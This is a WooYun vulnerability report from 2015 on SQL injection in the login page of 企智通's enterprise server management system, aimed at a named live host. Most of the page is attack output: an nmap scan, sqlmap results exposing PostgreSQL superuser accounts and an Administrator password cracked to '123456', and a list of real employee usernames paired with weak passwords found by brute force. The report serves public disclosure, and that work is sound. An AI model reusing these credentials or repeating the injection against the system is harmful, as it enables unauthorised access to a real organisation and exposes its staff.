当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0160299
漏洞标题:
企智通企业服务器综合管理系统sql漏洞,获得数据库信息及登录信息
相关厂商:
企智通
漏洞作者:
scanner
提交时间:
2015-12-11 16:51
修复时间:
2016-01-23 15:16
公开时间:
2016-01-23 15:16
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-12-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

企智通企业服务器综合管理系统sql漏洞,获得数据库信息及登录信息

详细说明:

1、网络遍历获得一个存活各类服务的ip地址。

Starting Nmap 7.00 ( https://nmap.org ) at 2015-12-10 14:35 CST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
Initiating NSE at 14:36
Completed NSE at 14:36, 0.00s elapsed
Initiating Ping Scan at 14:36
Scanning 121.14.204.18 [4 ports]
Completed Ping Scan at 14:36, 0.45s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:36
Completed Parallel DNS resolution of 1 host. at 14:36, 0.13s elapsed
Initiating SYN Stealth Scan at 14:36
Scanning 121.14.204.18 [1000 ports]
Discovered open port 23/tcp on 121.14.204.18
Discovered open port 25/tcp on 121.14.204.18
Discovered open port 8080/tcp on 121.14.204.18
Discovered open port 22/tcp on 121.14.204.18
Discovered open port 443/tcp on 121.14.204.18
Discovered open port 80/tcp on 121.14.204.18
Discovered open port 8000/tcp on 121.14.204.18
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 26.87% done; ETC: 14:38 (0:01:13 remaining)
SYN Stealth Scan Timing: About 28.33% done; ETC: 14:39 (0:02:24 remaining)
Increasing send delay for 121.14.204.18 from 0 to 5 due to 11 out of 30 dropped probes since last increase.
SYN Stealth Scan Timing: About 29.77% done; ETC: 14:41 (0:03:25 remaining)
Completed SYN Stealth Scan at 14:38, 102.34s elapsed (1000 total ports)
Initiating Service scan at 14:38
Scanning 7 services on 121.14.204.18


2、使用地址+端口进行登录

11.png


3、对页面进行sql测试

POST https://auth.qzt360.com:443/admin/doCheckLogin.jsp
POST data: strVcName=&strVcPassword=


漏洞证明:

web application technology: JSP
back-end DBMS operating system: Linux Red Hat
back-end DBMS: PostgreSQL
banner:    'PostgreSQL 8.2.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)'
current user:    'pg'
current schema (equivalent to database on PostgreSQL):    'public'
hostname:	None
current user is DBA:    True
database management system users [2]:
[*] Administrator
[*] pg
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
database management system users password hashes:
[*] Administrator [1]:
    password hash: md59b78e9569873a28178bc341daea12d93
    clear-text password: 123456
database management system users privileges:
[*] Administrator (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
[*] pg (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
database management system users roles:
[*] Administrator (administrator) [3]:
    role: catupd
    role: createdb
    role: super
[*] pg (administrator) [3]:
    role: catupd
    role: createdb
    role: super


[*] Administrator [1]:
    password hash: md59b78e9569873a28178bc341daea12d93
    clear-text password: 123456
database management system users privileges:
[*] Administrator (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
[*] pg (administrator) [3]:
    privilege: catupd
    privilege: createdb
    privilege: super
database management system users roles:
[*] Administrator (administrator) [3]:
    role: catupd
    role: createdb
    role: super
[*] pg (administrator) [3]:
    role: catupd
    role: createdb
    role: super
Database: pg_catalog
Table: pg_autovacuum
[0 entries]
+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+
| vacrelid | enabled | vac_cost_limit | freeze_min_age | vac_cost_delay | freeze_max_age | vac_base_thresh | anl_base_thresh | vac_scale_factor | anl_scale_factor |
+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+
+----------+---------+----------------+----------------+----------------+----------------+-----------------+-----------------+------------------+------------------+
sqlmap got a 302 redirect to 'https://auth.qzt360.com/admin/welcome.jsp'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
y
Database: pg_catalog                                                           
Table: pg_language
[0 entries]
+-----------------------+-----------------------+---------+
| lanacl                | lanispl               | lanname |
+-----------------------+-----------------------+---------+
+-----------------------+-----------------------+---------+
0			302	false	false	544	baseline request
127	panyj	123123	302	false	false	544	
386	panyj	123123	302	false	false	544	
453	panyj	123123	302	false	false	544	
969	lixinr	123123	302	false	false	544	
1114	dingyj	123123	302	false	false	544	
1192	dingyj	123123	302	false	false	544	
1295	yaol	123123	302	false	false	544	
1673	zhangn	123123	302	false	false	544	
1899	huangzx	123123	302	false	false	544	
2017	shenzy	123123	302	false	false	544	
2027	shenzy	123123	302	false	false	544	
2036	shenzy	123123	302	false	false	544	
2045	shenzy	123123	302	false	false	544	
3026	fengk	123456	302	false	false	544	
3659	yanghp	123456	302	false	false	544	
3758	chensx	123456	302	false	false	544	
3802	chensx	123456	302	false	false	544	
3813	mazj	123456	302	false	false	544	
3993	sunz	123456	302	false	false	544	
4161	zhangwh	123456	302	false	false	544	
4183	zhangwh	123456	302	false	false	544	
4277	yubin	123456	302	false	false	544	
4291	yubin	123456	302	false	false	544	
4323	yubin	123456	302	false	false	544	
4428	chenxf	123456	302	false	false	544	
4522	huoyq	123456	302	false	false	544	
4526	huoyq	123456	302	false	false	544	
4528	huoyq	123456	302	false	false	544
Database: pg_catalog                                                           
Table: pg_namespace
[0 entries]
+--------+
| nspacl |
+--------+
+--------+
Database: pg_catalog                                                           
Table: pg_authid
[0 entries]
+-------------+
| rolcanlogin |
+-------------+
+-------------+
Database: pg_catalog                                                           
Table: pg_description
[918 entries]
+--------+----------+----------+------------------------------------------------------------------------+
| objoid | classoid | objsubid | description                                                            |
+--------+----------+----------+------------------------------------------------------------------------+
| 1067   | 1255     | 0        | non-persistent series generator                                        |
| 1068   | 1255     | 0        | non-persistent series generator                                        |
| 1069   | 1255     | 0        | non-persistent series generator                                        |
| 1078   | 1255     | 0        | less-equal-greater                                                     |
| 1079   | 1255     | 0        | convert text to regclass                                               |
| 1080   | 1255     | 0        | hash                                                                   |
| 1081   | 1255     | 0        | format a type oid and atttypmod to canonical SQL                       |
| 1082   | 1247     | 0        | ANSI SQL date                                                          |
| 1083   | 1247     | 0        | hh:mm:ss, ANSI SQL time                                                |
| 1084   | 1255     | 0        | I/O                                                                    |
| 1085   | 1255     | 0        | I/O                                                                    |
| 1086   | 1255     | 0        | equal                                                                  |
| 1087   | 1255     | 0        | less-than                                                              |
| 1088   | 1255     | 0        | less-than-or-equal                                                     |
| 1089   | 1255     | 0        | greater-than                                                           |
| 1090   | 1255     | 0        | greater-than-or-equal                                                  |
| 1091   | 1255     | 0        | not equal                                                              |
| 1092   | 1255     | 0        | less-equal-greater                                                     |
| 1102   | 1255     | 0        | less-than                                                              |
| 1103   | 1255     | 0        | less-than-or-equal                                                     |
| 1104   | 1255     | 0        | greater-than                                                           |
| 1105   | 1255     | 0        | greater-than-or-equal                                                  |
| 1106   | 1255     | 0        | not equal                                                              |
| 1107   | 1255     | 0        | less-equal-greater                                                     |
| 1114   | 1247     | 0        | date and time                                                          |
| 1138   | 1255     | 0        | larger of two                                                          |
| 1139   | 1255     | 0        | smaller of two                                                         |
| 1140   | 1255     | 0        | subtract                                                               |
| 1141   | 1255     | 0        | add                                                                    |
| 1142   | 1255     | 0        | subtract                                                               |
| 1143   | 1255     | 0        | I/O                                                                    |
| 1144   | 1255     | 0        | I/O                                                                    |
| 1145   | 1255     | 0        | equal                                                                  |
| 1146   | 1255     | 0        | add                                                                    |
| 1147   | 1255     | 0        | subtract                                                               |
| 1148   | 1255     | 0        | multiply                                                               |
| 1149   | 1255     | 0        | divide                                                                 |
| 1150   | 1255     | 0        | I/O                                                                    |
| 1151   | 1255     | 0        | I/O                                                                    |
| 1152   | 1255     | 0        | equal                                                                  |
| 1153   | 1255     | 0        | not equal                                                              |
| 1154   | 1255     | 0        | less-than                                                              |
| 1155   | 1255     | 0        | less-than-or-equal                                                     |
| 1156   | 1255     | 0        | greater-than-or-equal                                                  |
| 1157   | 1255     | 0        | greater-than                                                           |
| 1158   | 1255     | 0        | convert UNIX epoch to timestamptz                                      |
| 1159   | 1255     | 0        | adjust timestamp to new time zone                                      |
| 1160   | 1255     | 0        | I/O                                                                    |
| 1161   | 1255     | 0        | I/O                                                                    |
| 1162   | 1255     | 0        | equal                                                                  |
| 1163   | 1255     | 0        | not equal                                                              |
| 1164   | 1255     | 0        | less-than                                                              |
| 1165   | 1255     | 0        | less-than-or-equal                                                     |
| 1166   | 1255     | 0        | greater-than-or-equal                                                  |
| 1167   | 1255     | 0        | greater-than                                                           |
| 1168   | 1255     | 0        | subtract                                                               |
| 1169   | 1255     | 0        | add                                                                    |
| 1170   | 1255     | 0        | subtract                                                               |
| 1171   | 1255     | 0        | extract field from timestamp with time zone                            |
| 1172   | 1255     | 0        | extract field from interval                                            |
| 1173   | 1255     | 0        | convert abstime to timestamp with time zone                            |
| 1174   | 1255     | 0        | convert date to timestamp with time zone                               |
| 1175   | 1255     | 0        | promote groups of 24 hours to numbers of days                          |
| 1176   | 1255     | 0        | convert date and time to timestamp with time zone                      |
| 1177   | 1255     | 0        | convert reltime to interval                                            |
| 1178   | 1255     | 0        | convert timestamp with time zone to date                               |
| 1179   | 1255     | 0        | convert abstime to date                                                |
| 1180   | 1255     | 0        | convert timestamp with time zone to abstime                            |
| 1181   | 1255     | 0        | age of a transaction ID, in transactions before current transaction    |
| 1184   | 1247     | 0        | date and time with time zone                                           |
| 1186   | 1247     | 0        | @ <number> <units>, time interval                                      |
| 1188   | 1255     | 0        | subtract                                                               |
| 1189   | 1255     | 0        | plus                                                                   |
| 1190   | 1255     | 0        | minus                                                                  |
| 1191   | 1255     | 0        | convert text to timestamp with time zone                               |
| 1192   | 1255     | 0        | convert timestamp with time zone to text                               |
| 1193   | 1255     | 0        | convert interval to text                                               |
| 1194   | 1255     | 0        | convert interval to reltime                                            |
| 1195   | 1255     | 0        | smaller of two                                                         |
| 1196   | 1255     | 0        | larger of two                                                          |
| 1197   | 1255     | 0        | smaller of two                                                         |
| 1198   | 1255     | 0        | larger of two                                                          |
| 1199   | 1255     | 0        | date difference preserving months and years                            |
| 1200   | 1255     | 0        | adjust interval precision                                              |
| 1215   | 1255     | 0        | get description for object id and catalog name                         |
| 1216   | 1255     | 0        | get description for table column                                       |
| 1217   | 1255     | 0        | truncate timestamp with time zone to specified units                   |
| 1218   | 1255     | 0        | truncate interval to specified units                                   |
| 1219   | 1255     | 0        | increment                                                              |
| 1230   | 1255     | 0        | absolute value                                                         |
| 1236   | 1255     | 0        | larger of two                                                          |
| 1237   | 1255     | 0        | smaller of two                                                         |
| 1238   | 1255     | 0        | matches regex., case-insensitive                                       |
| 1239   | 1255     | 0        | does not match regex., case-insensitive                                |
| 1240   | 1255     | 0        | matches regex., case-insensitive                                       |
| 1241   | 1255     | 0        | does not match regex., case-insensitive                                |
| 1242   | 1255     | 0        | I/O                                                                    |
| 1243   | 1255     | 0        | I/O                                                                    |
| 1244   | 1255     | 0        | I/O                                                                    |
| 1245   | 1255     | 0        | I/O                                                                    |
| 1246   | 1255     | 0        | less-than                                                              |
| 1251   | 1255     | 0        | absolute value                                                         |
| 1252   | 1255     | 0        | does not match regex., case-sensitive                                  |
| 1253   | 1255     | 0        | absolute value                                                         |
| 1254   | 1255     | 0        | matches regex., case-sensitive                                         |
| 1256   | 1255     | 0        | does not match regex., case-sensitive                                  |
| 1257   | 1255     | 0        | length                                                                 |
| 1258   | 1255     | 0        | concatenate                                                            |
| 1263   | 1255     | 0        | convert text to interval                                               |
| 1264   | 1255     | 0        | convert encoding name to encoding id                                   |
| 1265   | 1255     | 0        | not equal                                                              |
| 1266   | 1247     | 0        | hh:mm:ss, ANSI SQL time                                                |
| 1267   | 1255     | 0        | I/O                                                                    |
| 1268   | 1255     | 0        | btree(internal)                                                        |
| 1269   | 1255     | 0        | bytes required to store the value, perhaps with compression            |
| 1271   | 1255     | 0        | SQL92 interval comparison                                              |
| 1272   | 1255     | 0        | convert date and time to timestamp                                     |
| 1273   | 1255     | 0        | extract field from time with time zone                                 |
| 1274   | 1255     | 0        | add                                                                    |
| 1275   | 1255     | 0        | subtract                                                               |
| 1276   | 1255     | 0        | multiply                                                               |
| 1277   | 1255     | 0        | divide                                                                 |
| 1278   | 1255     | 0        | add                                                                    |
| 1279   | 1255     | 0        | subtract                                                               |
| 1280   | 1255     | 0        | multiply                                                               |
| 1281   | 1255     | 0        | divide                                                                 |
| 1282   | 1255     | 0        | quote an identifier for usage in a querystring                         |
| 1283   | 1255     | 0        | quote a literal for usage in a querystring                             |
| 1285   | 1255     | 0        | not in                                                                 |
| 1286   | 1255     | 0        | not in                                                                 |
| 1287   | 1255     | 0        | convert int8 to oid                                                    |
| 1288   | 1255     | 0        | convert oid to int8                                                    |
| 1289   | 1255     | 0        | convert int8 to text                                                   |
| 1290   | 1255     | 0        | convert text to int8                                                   |
| 1291   | 1255     | 0        | adjust any array to new element typmod                                 |
| 1292   | 1255     | 0        | equal                                                                  |
| 1293   | 1255     | 0        | latest tid of a tuple                                                  |
| 1294   | 1255     | 0        | latest tid of a tuple                                                  |
| 1295   | 1255     | 0        | promote groups of 30 days to numbers of months                         |
| 1296   | 1255     | 0        | convert time and date to timestamp                                     |
| 1297   | 1255     | 0        | convert date and time with time zone to timestamp with time zone       |
| 1298   | 1255     | 0        | convert time with time zone and date to timestamp with time zone       |
| 1299   | 1255     | 0        | current transaction time                                               |
| 1300   | 1255     | 0        | restriction selectivity for position-comparison operators              |
| 1301   | 1255     | 0        | join selectivity for position-comparison operators                     |
| 1302   | 1255     | 0        | restriction selectivity for containment comparison operators           |
| 1303   | 1255     | 0        | join selectivity for containment comparison operators                  |
| 1304   | 1255     | 0        | SQL92 interval comparison                                              |
| 1305   | 1255     | 0        | SQL92 interval comparison                                              |
| 1306   | 1255     | 0        | SQL92 interval comparison                                              |
| 1307   | 1255     | 0        | SQL92 interval comparison                                              |
| 1308   | 1255     | 0        | SQL92 interval comparison                                              |
| 1309   | 1255     | 0        | SQL92 interval comparison                                              |
| 1310   | 1255     | 0        | SQL92 interval comparison                                              |
| 1311   | 1255     | 0        | SQL92 interval comparison                                              |
| 1312   | 1255     | 0        | I/O                                                                    |
| 1313   | 1255     | 0        | I/O                                                                    |
| 1314   | 1255     | 0        | less-equal-greater                                                     |
| 1315   | 1255     | 0        | less-equal-greater                                                     |
| 1316   | 1255     | 0        | convert timestamp to time                                              |
| 1317   | 1255     | 0        | length                                                                 |
| 1318   | 1255     | 0        | character length                                                       |
| 1319   | 1255     | 0        | equal                                                                  |
| 1326   | 1255     | 0        | divide                                                                 |
| 1339   | 1255     | 0        | base 10 logarithm                                                      |
| 1340   | 1255     | 0        | base 10 logarithm                                                      |
| 1341   | 1255     | 0        | natural logarithm                                                      |
| 1342   | 1255     | 0        | round to nearest integer                                               |
| 1343   | 1255     | 0        | truncate to integer                                                    |
| 1344   | 1255     | 0        | square root                                                            |
| 1345   | 1255     | 0        | cube root                                                              |
| 1346   | 1255     | 0        | exponentiation                                                         |
| 1347   | 1255     | 0        | exponential                                                            |
| 1348   | 1255     | 0        | get description for object id (deprecated)                             |
| 1349   | 1255     | 0        | print type names of oidvector field                                    |
| 1350   | 1255     | 0        | I/O                                                                    |
| 1351   | 1255     | 0        | I/O                                                                    |
| 1352   | 1255     | 0        | equal                                                                  |
| 1353   | 1255     | 0        | not equal                                                              |
| 1354   | 1255     | 0        | less-than                                                              |
| 1355   | 1255     | 0        | less-than-or-equal                                                     |
| 1356   | 1255     | 0        | greater-than-or-equal                                                  |
| 1357   | 1255     | 0        | greater-than                                                           |
| 1358   | 1255     | 0        | less-equal-greater                                                     |
| 1359   | 1255     | 0        | convert date and time with time zone to timestamp with time zone       |
| 1362   | 1255     | 0        | hostmask of address                                                    |
| 1364   | 1255     | 0        | convert abstime to time                                                |
| 1365   | 1255     | 0        | make ACL item                                                          |
| 1367   | 1255     | 0        | character length                                                       |
| 1368   | 1255     | 0        | exponentiation                                                         |
| 1369   | 1255     | 0        | character length                                                       |
| 1370   | 1255     | 0        | convert time to interval                                               |
| 1371   | 1255     | 0        | view system lock information                                           |
| 1372   | 1255     | 0        | character length                                                       |
| 1373   | 1255     | 0        | coerce array to another type and adjust element typmod                 |
| 1374   | 1255     | 0        | octet length                                                           |
| 1375   | 1255     | 0        | octet length                                                           |
| 1376   | 1255     | 0        | factorial                                                              |
| 1377   | 1255     | 0        | larger of two                                                          |
| 1378   | 1255     | 0        | smaller of two                                                         |
| 1379   | 1255     | 0        | larger of two                                                          |
| 1380   | 1255     | 0        | smaller of two                                                         |
| 1381   | 1255     | 0        | character length                                                       |
| 1382   | 1255     | 0        | extract field from abstime                                             |
| 1383   | 1255     | 0        | extract field from reltime                                             |
| 1384   | 1255     | 0        | extract field from date                                                |
| 1385   | 1255     | 0        | extract field from time                                                |
| 1386   | 1255     | 0        | date difference from today preserving months and years                 |
| 1387   | 1255     | 0        | constraint description                                                 |
| 1388   | 1255     | 0        | convert timestamptz to timetz                                          |
| 1389   | 1255     | 0        | finite timestamp?                                                      |
| 1390   | 1255     | 0        | finite interval?                                                       |
| 1391   | 1255     | 0        | Statistics: Start time for current backend session                     |
| 1392   | 1255     | 0        | Statistics: Address of client connected to backend                     |
| 1393   | 1255     | 0        | Statistics: Port number of client connected to backend                 |
| 1394   | 1255     | 0        | absolute value                                                         |
| 1395   | 1255     | 0        | absolute value                                                         |
| 1396   | 1255     | 0        | absolute value                                                         |
| 1397   | 1255     | 0        | absolute value                                                         |
| 1398   | 1255     | 0        | absolute value                                                         |
| 1400   | 1255     | 0        | convert varchar to name                                                |
| 1401   | 1255     | 0        | convert name to varchar                                                |
| 1402   | 1255     | 0        | current schema name                                                    |
| 1403   | 1255     | 0        | current schema search list                                             |
| 1404   | 1255     | 0        | substitute portion of string                                           |
| 1405   | 1255     | 0        | substitute portion of string                                           |
| 1406   | 1255     | 0        | vertically aligned?                                                    |
| 1407   | 1255     | 0        | horizontally aligned?                                                  |
| 1408   | 1255     | 0        | parallel?                                                              |
| 1409   | 1255     | 0        | perpendicular?                                                         |
| 1410   | 1255     | 0        | vertical?                                                              |
| 1411   | 1255     | 0        | horizontal?                                                            |
| 1412   | 1255     | 0        | parallel?                                                              |
| 1413   | 1255     | 0        | perpendicular?                                                         |
| 1414   | 1255     | 0        | vertical?                                                              |
| 1415   | 1255     | 0        | horizontal?                                                            |
| 1416   | 1255     | 0        | center of                                                              |
| 1417   | 1255     | 0        | bool is not true (ie, false or unknown)                                |
| 1418   | 1255     | 0        | bool is not false (ie, true or unknown)                                |
| 1419   | 1255     | 0        | convert interval to time                                               |
| 1421   | 1255     | 0        | convert points to box                                                  |
| 1422   | 1255     | 0        | add point to box (translate)                                           |
| 1423   | 1255     | 0        | subtract point from box (translate)                                    |
| 1424   | 1255     | 0        | multiply box by point (scale)                                          |
| 1425   | 1255     | 0        | divide box by point (scale)                                            |
| 1426   | 1255     | 0        | path contains point?                                                   |
| 1427   | 1255     | 0        | I/O                                                                    |
| 1428   | 1255     | 0        | polygon contains point?                                                |
| 1429   | 1255     | 0        | point contained in polygon?                                            |
| 1430   | 1255     | 0        | path closed?                                                           |
| 1431   | 1255     | 0        | path open?                                                             |
| 1432   | 1255     | 0        | number of points in path                                               |
| 1433   | 1255     | 0        | close path                                                             |
| 1434   | 1255     | 0        | open path                                                              |
| 1435   | 1255     | 0        | concatenate open paths                                                 |
| 1436   | 1255     | 0        | add (translate path)                                                   |
+--------+----------+----------+------------------------------------------------------------------------+

修复方案:

修复注入漏洞,特别是123456弱口令是干啥的?

版权声明:转载请注明来源 scanner@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝